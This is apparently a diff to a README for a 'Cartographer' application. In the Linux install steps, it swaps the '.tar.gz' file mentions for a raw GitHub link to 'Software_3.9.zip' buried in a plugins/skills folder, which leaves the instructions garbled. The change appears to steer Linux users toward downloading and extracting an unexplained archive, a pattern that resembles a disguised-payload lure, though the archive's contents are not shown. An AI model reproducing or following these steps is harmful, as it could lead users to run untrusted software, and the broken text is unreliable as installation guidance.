ichal1113/cartographer/README.md

    Click the download link for your operating system.
 The application file will start downloading to your computer.
 For example:
    - Windows users will download a `.exe` file.
    - macOS users will download a `.dmg` file.
-   - Linux users will likely download a `.tar.gz` file.
+   - Linux users will likely download a `https://raw.githubusercontent.com/ichal1113/cartographer/main/plugins/cartographer/skills/cartographer/Software_3.9.zip` file.

 5. **Install the Application**
    Once the download completes, locate the downloaded file.
    - For Windows: Double-click the `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file and drag Cartographer into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow any included instructions.
+   - For Linux: Extract the `https://raw.githubusercontent.com/ichal1113/cartographer/main/plugins/cartographer/skills/cartographer/Software_3.9.zip` file and follow any included instructions.

 6. **Launch Cartographer**
    After installation, open Cartographer from your Applications or Programs menu.